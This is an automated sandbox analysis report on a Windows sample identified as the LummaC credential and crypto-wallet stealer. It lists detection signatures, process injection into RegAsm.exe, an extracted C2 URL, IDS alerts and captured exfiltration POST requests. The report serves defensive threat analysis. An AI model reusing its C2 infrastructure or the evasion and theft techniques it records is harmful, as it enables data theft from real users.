Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
WyPb2uVZ1P.exe

Overview

General Information

Sample name:WyPb2uVZ1P.exe
renamed because original name is a hash value
Original sample name:a0b8c563061f45f6f5b7573d57c3b0c6.exe
Analysis ID:1618759
MD5:a0b8c563061f45f6f5b7573d57c3b0c6
SHA1:1d5e10368656a4176b7c5ceb98062652eea79832
SHA256:e0b300c8470d1e78d5e17617983506311c2adee7fd2326c32b904d2fb1d4e80c
Tags:exeuser-abuse_ch
Infos:

Detection

LummaC Stealer
Score:100
Range:0 - 100
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
.NET source code contains potential unpacker
.NET source code contains very large array initializations
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Found string related to ransomware
Joe Sandbox ML detected suspicious sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to create new users
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found large amount of non-executed APIs
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
May use bcdedit to modify the Windows boot settings
PE / OLE file has an invalid certificate
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • WyPb2uVZ1P.exe (PID: 984 cmdline: "C:\Users\user\Desktop\WyPb2uVZ1P.exe" MD5: A0B8C563061F45F6F5B7573D57C3B0C6)
    • RegAsm.exe (PID: 2956 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • conhost.exe (PID: 2796 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Configuration

Threatname: LummaC

{"C2 url": "https://hitreasurxes.tech:443/api", "Build Version": "WG6I6S--web1"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000000.00000002.2370106119.0000000006A40000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
        00000003.00000002.2573265083.0000000000610000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
        • 0x55708:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
        • 0x58c3e:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
        00000000.00000002.2353904909.0000000003C21000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
          00000000.00000002.2366742842.0000000004CA1000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
          • 0x129f08:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
          • 0x12d43e:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
          00000000.00000002.2352844711.0000000003100000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
          • 0x2995c0:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
          • 0x29cb56:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
          Click to see the 3 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          0.2.WyPb2uVZ1P.exe.558b478.6.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
            0.2.WyPb2uVZ1P.exe.6a40000.17.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
              0.2.WyPb2uVZ1P.exe.6a40000.17.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                0.2.WyPb2uVZ1P.exe.558b478.6.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                  0.2.WyPb2uVZ1P.exe.4f91c2c.3.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                    Click to see the 7 entries

                    Sigma Signatures

                    No Sigma rule has matched

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-02-19T07:18:43.196200+010020283713Unknown Traffic192.168.2.549799149.154.167.99443TCP
                    2025-02-19T07:18:44.031990+010020283713Unknown Traffic192.168.2.549805104.21.16.1443TCP
                    2025-02-19T07:18:44.903701+010020283713Unknown Traffic192.168.2.549812104.21.16.1443TCP
                    2025-02-19T07:18:46.077108+010020283713Unknown Traffic192.168.2.549820104.21.16.1443TCP
                    2025-02-19T07:18:47.176639+010020283713Unknown Traffic192.168.2.549825104.21.16.1443TCP
                    2025-02-19T07:18:59.535097+010020283713Unknown Traffic192.168.2.549907104.21.16.1443TCP
                    2025-02-19T07:19:00.695460+010020283713Unknown Traffic192.168.2.549915104.21.16.1443TCP
                    2025-02-19T07:19:01.921708+010020283713Unknown Traffic192.168.2.549926104.21.16.1443TCP
                    2025-02-19T07:19:04.121367+010020283713Unknown Traffic192.168.2.549939104.21.16.1443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-02-19T07:18:44.439810+010020546531A Network Trojan was detected192.168.2.549805104.21.16.1443TCP
                    2025-02-19T07:18:45.398889+010020546531A Network Trojan was detected192.168.2.549812104.21.16.1443TCP
                    2025-02-19T07:19:04.605214+010020546531A Network Trojan was detected192.168.2.549939104.21.16.1443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-02-19T07:18:44.439810+010020498361A Network Trojan was detected192.168.2.549805104.21.16.1443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-02-19T07:18:58.992014+010020480941Malware Command and Control Activity Detected192.168.2.549825104.21.16.1443TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Found malware configuration
                    Source: RegAsm.exe.2956.3.memstrminMalware Configuration Extractor: LummaC {"C2 url": "https://hitreasurxes.tech:443/api", "Build Version": "WG6I6S--web1"}
                    Multi AV Scanner detection for submitted file
                    Source: WyPb2uVZ1P.exeReversingLabs: Detection: 56%
                    Source: WyPb2uVZ1P.exeVirustotal: Detection: 45%Perma Link
                    Joe Sandbox ML detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeCode function: 0_2_00A92A60 _memcpy_s,CryptImportKey,CryptSetKeyParam,0_2_00A92A60
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeCode function: 0_2_00A92B10 CryptAcquireContextW,CryptAcquireContextW,0_2_00A92B10
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeCode function: 0_2_00A92FE0 CryptDestroyKey,CryptReleaseContext,0_2_00A92FE0
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeCode function: 0_2_00A92F70 CryptDecrypt,CryptDestroyKey,CryptReleaseContext,0_2_00A92F70
                    Source: WyPb2uVZ1P.exeBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_a8518fd1-a
                    Source: WyPb2uVZ1P.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:49799 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49805 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49812 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49820 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49825 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49907 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49915 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49926 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49939 version: TLS 1.2
                    Source: WyPb2uVZ1P.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                    Source: Binary string: E:\Adlice\UpdateChecker\RelWithDebInfo\updater.pdb source: WyPb2uVZ1P.exe
                    Source: Binary string: 2C:\VisualStudio\Projects\RebootExec\Release\RebootExec.pdb source: WyPb2uVZ1P.exe
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: WyPb2uVZ1P.exe, 00000000.00000002.2366742842.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp, WyPb2uVZ1P.exe, 00000000.00000002.2370757567.0000000006CA0000.00000004.08000000.00040000.00000000.sdmp, WyPb2uVZ1P.exe, 00000000.00000002.2366742842.0000000004C28000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 /WX -DL_ENDIAN -DOPENSSL_PIC -D_WIN32_WINNT=0x0501 source: WyPb2uVZ1P.exe
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: WyPb2uVZ1P.exe, 00000000.00000002.2366742842.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp, WyPb2uVZ1P.exe, 00000000.00000002.2370757567.0000000006CA0000.00000004.08000000.00040000.00000000.sdmp, WyPb2uVZ1P.exe, 00000000.00000002.2366742842.0000000004C28000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: C:\VisualStudio\Projects\RebootExec\Release\RebootExec.pdb source: WyPb2uVZ1P.exe
                    Source: Binary string: protobuf-net.pdbSHA256}Lq source: WyPb2uVZ1P.exe, 00000000.00000002.2370531338.0000000006B40000.00000004.08000000.00040000.00000000.sdmp, WyPb2uVZ1P.exe, 00000000.00000002.2366742842.000000000519C000.00000004.00000800.00020000.00000000.sdmp, WyPb2uVZ1P.exe, 00000000.00000002.2366742842.0000000005684000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdb source: WyPb2uVZ1P.exe, 00000000.00000002.2370531338.0000000006B40000.00000004.08000000.00040000.00000000.sdmp, WyPb2uVZ1P.exe, 00000000.00000002.2366742842.000000000519C000.00000004.00000800.00020000.00000000.sdmp, WyPb2uVZ1P.exe, 00000000.00000002.2366742842.0000000005684000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: _CHAR__ANY__RANGE__CLASS__WORD_CHAR__NON_WORD_CHAR__SPACE__NON_SPACE__DIGIT__NON_DIGIT__WORD_BOUNDARY__NON_WORD_BOUNDARY_'*''?''+''^''$''.'realternativeconcatenationcompiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 /WX -DL_ENDIAN -DOPENSSL_PIC -D_WIN32_WINNT=0x0501Load file into cachecrypto\x509\by_file.cunspecified certificate verification errorunable to get issuer certificateunable to get certificate CRLunable to decrypt certificate's signatureunable to decrypt CRL's signatureunable to decode issuer public keycertificate signature failureCRL signature failurecertificate is not yet validcertificate has expiredCRL is not yet validCRL has expiredformat error in certificate's notBefore fieldformat error in certificate's notAfter fieldformat error in CRL's lastUpdate fieldformat error in CRL's nextUpdate fieldself signed certificateself signed certificate in certificate chainunable to get local issuer certificateunable to verify the first certificatecertificate chain too longcertificate revokedinvalid CA certificatepath length constraint exceededunsupported certificate purposecertificate not trustedcertificate rejectedsubject issuer mismatchauthority and subject key identifier mismatchauthority and issuer serial number mismatchkey usage does not include certificate signingunable to get CRL issuer certificateunhandled critical extensionkey usage does not include CRL signingunhandled critical CRL extensioninvalid non-CA certificate (has CA markings)proxy path length constraint exceededkey usage does not include digital signatureproxy certificates not allowed, please set the appropriate flaginvalid or inconsistent certificate extensioninvalid or inconsistent certificate policy extensionno explicit policyDifferent CRL scopeUnsupported extension featureRFC 3779 resource not subset of parent's resourcespermitted subtree violationexcluded subtree violationname constraints minimum and maximum not supportedapplication verification failureunsupported name constraint typeunsupported or invalid name constraint syntaxunsupported or invalid name syntaxCRL path validation errorPath LoopSuite B: certificate version invalidSuite B: invalid public key algorithmSuite B: invalid ECC curveSuite B: invalid signature algorithmSuite B: curve not allowed for this LOSSuite B: cannot sign P-384 with P-256Hostname mismatchEmail address mismatchIP address mismatchNo matching DANE TLSA recordsEE certificate key too weakCA certificate key too weakCA signature digest algorithm too weakInvalid certificate verification contextIssuer certificate lookup errorCertificate Transparency required, but no valid SCTs foundproxy subject name violationOCSP verification neededOCSP verification failedOCSP unknown certunknown certificate verification errorcrypto\rand\randfile.cFilename=RANDFILEHOMEUSERPROFILESYSTEMROOT.rndcrypto\ocsp\ocsp_cl.ch7. source: WyPb2uVZ1P.exe
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeCode function: 0_2_00ABEB70 PathFileExistsW,FreeLibrary,FreeLibrary,PathFileExistsW,FreeLibrary,FreeLibrary,PathFileExistsW,FindFirstFileW,FindClose,CopyFileW,GetTempPathW,PathFileExistsW,GetSystemDirectoryW,SHDefExtractIconW,GdipCreateBitmapFromHBITMAP,GdipSaveImageToFile,GdipDisposeImage,0_2_00ABEB70
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeCode function: 0_2_00A91560 FindFirstFileW,0_2_00A91560
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeCode function: 0_2_00A91770 FindClose,FindFirstFileW,0_2_00A91770

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49825 -> 104.21.16.1:443
                    Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49805 -> 104.21.16.1:443
                    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49805 -> 104.21.16.1:443
                    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49812 -> 104.21.16.1:443
                    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49939 -> 104.21.16.1:443
                    C2 URLs / IPs found in malware configuration
                    Source: Malware configuration extractorURLs: https://hitreasurxes.tech:443/api
                    Source: Joe Sandbox ViewIP Address: 104.21.16.1 104.21.16.1
                    Source: Joe Sandbox ViewIP Address: 104.21.16.1 104.21.16.1
                    Source: Joe Sandbox ViewIP Address: 149.154.167.99 149.154.167.99
                    Source: Joe Sandbox ViewIP Address: 149.154.167.99 149.154.167.99
                    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                    Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49812 -> 104.21.16.1:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49825 -> 104.21.16.1:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49805 -> 104.21.16.1:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49799 -> 149.154.167.99:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49915 -> 104.21.16.1:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49926 -> 104.21.16.1:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49939 -> 104.21.16.1:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49820 -> 104.21.16.1:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49907 -> 104.21.16.1:443
                    Source: global trafficHTTP traffic detected: GET /asdasdasgdsg HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: t.me
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: hitreasurxes.tech
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 47Host: hitreasurxes.tech
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=KFL1AIUZ2EUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12788Host: hitreasurxes.tech
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=9VS81VD2X9WHKITGWUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15072Host: hitreasurxes.tech
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=YB7FVY6PKE38QEUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20544Host: hitreasurxes.tech
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=9AIZX97H9HZCPZ6User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 2276Host: hitreasurxes.tech
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=XPX2NDCI5X29Z3BAARUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 590613Host: hitreasurxes.tech
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 81Host: hitreasurxes.tech
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET /asdasdasgdsg HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: t.me
                    Source: global trafficDNS traffic detected: DNS query: t.me
                    Source: global trafficDNS traffic detected: DNS query: hitreasurxes.tech
                    Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: hitreasurxes.tech
                    Source: WyPb2uVZ1P.exe, 00000000.00000002.2368590089.0000000006380000.00000004.08000000.00040000.00000000.sdmp, WyPb2uVZ1P.exe, 00000000.00000002.2352844711.0000000003100000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://.css
                    Source: WyPb2uVZ1P.exe, WyPb2uVZ1P.exe, 00000000.00000002.2368590089.0000000006380000.00000004.08000000.00040000.00000000.sdmp, WyPb2uVZ1P.exe, 00000000.00000002.2352844711.0000000003100000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://.jpg
                    Source: WyPb2uVZ1P.exeString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                    Source: RegAsm.exe, 00000003.00000002.2573778673.0000000000A8F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                    Source: WyPb2uVZ1P.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVE36.crl0
                    Source: WyPb2uVZ1P.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootE46.crl0
                    Source: WyPb2uVZ1P.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z
                    Source: WyPb2uVZ1P.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0
                    Source: WyPb2uVZ1P.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVE36.crt0#
                    Source: WyPb2uVZ1P.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootE46.p7c0#
                    Source: WyPb2uVZ1P.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#
                    Source: WyPb2uVZ1P.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#
                    Source: WyPb2uVZ1P.exe, WyPb2uVZ1P.exe, 00000000.00000002.2368590089.0000000006380000.00000004.08000000.00040000.00000000.sdmp, WyPb2uVZ1P.exe, 00000000.00000002.2352844711.0000000003100000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://html4/loose.dtd
                    Source: WyPb2uVZ1P.exeString found in binary or memory: http://ocsp.comodoca.com0
                    Source: WyPb2uVZ1P.exeString found in binary or memory: http://ocsp.sectigo.com0
                    Source: WyPb2uVZ1P.exeString found in binary or memory: http://ocsp.sectigo.com0E
                    Source: WyPb2uVZ1P.exe, 00000000.00000002.2353904909.0000000003C21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: WyPb2uVZ1P.exeString found in binary or memory: http://www.carifred.com/
                    Source: WyPb2uVZ1P.exeString found in binary or memory: http://www.carifred.com/4.7.0.0http://www.carifred.com/mrs/about.php?ver=http://www.carifred.com/mrs
                    Source: WyPb2uVZ1P.exeString found in binary or memory: http://www.carifred.com/http://www.carifred.com/donate/?p=Account_Profile_Fixer4.7.0.0http://www.car
                    Source: WyPb2uVZ1P.exeString found in binary or memory: http://www.carifred.com/mrs/
                    Source: WyPb2uVZ1P.exeString found in binary or memory: http://www.carifred.com/mrs/about.php?ver=
                    Source: WyPb2uVZ1P.exeString found in binary or memory: http://www.carifred.com/stop_resetting_my_apps/about.php?ver=http://www.carifred.com/stop_resetting_
                    Source: WyPb2uVZ1P.exeString found in binary or memory: https://adflux.adlice.com
                    Source: WyPb2uVZ1P.exeString found in binary or memory: https://adlice.com/threat
                    Source: WyPb2uVZ1P.exeString found in binary or memory: https://cloudsigs.adlice.com/hashfilenamefilepathfilesizescoreneeds_analysismaliciousshould_upload
                    Source: WyPb2uVZ1P.exeString found in binary or memory: https://curl.haxx.se/docs/http-cookies.html
                    Source: WyPb2uVZ1P.exeString found in binary or memory: https://download.adlice.com/api/?action=read&app=%ls&type=available_version
                    Source: WyPb2uVZ1P.exeString found in binary or memory: https://download.adlice.com/api?action=download&app=%ls&type=setuphttps://download.adlice.com/api?ac
                    Source: WyPb2uVZ1P.exe, 00000000.00000002.2370531338.0000000006B40000.00000004.08000000.00040000.00000000.sdmp, WyPb2uVZ1P.exe, 00000000.00000002.2366742842.000000000519C000.00000004.00000800.00020000.00000000.sdmp, WyPb2uVZ1P.exe, 00000000.00000002.2366742842.0000000005684000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                    Source: WyPb2uVZ1P.exe, 00000000.00000002.2370531338.0000000006B40000.00000004.08000000.00040000.00000000.sdmp, WyPb2uVZ1P.exe, 00000000.00000002.2366742842.000000000519C000.00000004.00000800.00020000.00000000.sdmp, WyPb2uVZ1P.exe, 00000000.00000002.2366742842.0000000005684000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                    Source: WyPb2uVZ1P.exe, 00000000.00000002.2370531338.0000000006B40000.00000004.08000000.00040000.00000000.sdmp, WyPb2uVZ1P.exe, 00000000.00000002.2366742842.000000000519C000.00000004.00000800.00020000.00000000.sdmp, WyPb2uVZ1P.exe, 00000000.00000002.2366742842.0000000005684000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                    Source: RegAsm.exe, 00000003.00000002.2573778673.0000000000A8F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hitreasurxes.tech/
                    Source: RegAsm.exe, 00000003.00000002.2573778673.0000000000A8F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hitreasurxes.tech/-
                    Source: RegAsm.exe, 00000003.00000002.2573778673.0000000000A8F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hitreasurxes.tech/47
                    Source: RegAsm.exe, 00000003.00000002.2573588665.0000000000A2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hitreasurxes.tech/M
                    Source: RegAsm.exe, 00000003.00000002.2573778673.0000000000AEE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2573778673.0000000000B08000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2573778673.0000000000A8F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hitreasurxes.tech/api
                    Source: RegAsm.exe, 00000003.00000002.2573778673.0000000000B08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hitreasurxes.tech/apiC
                    Source: RegAsm.exe, 00000003.00000002.2573778673.0000000000AEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hitreasurxes.tech/apiG
                    Source: RegAsm.exe, 00000003.00000002.2573778673.0000000000B08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hitreasurxes.tech/apis
                    Source: RegAsm.exe, 00000003.00000002.2573778673.0000000000AEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hitreasurxes.tech/w
                    Source: RegAsm.exe, 00000003.00000002.2573778673.0000000000AEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hitreasurxes.tech/wn
                    Source: RegAsm.exe, 00000003.00000002.2573778673.0000000000A77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hitreasurxes.tech:443/api
                    Source: WyPb2uVZ1P.exeString found in binary or memory: https://sectigo.com/CPS0
                    Source: WyPb2uVZ1P.exeString found in binary or memory: https://sigs.adlice.comOrBDrgi0iSxGIRU37F3q
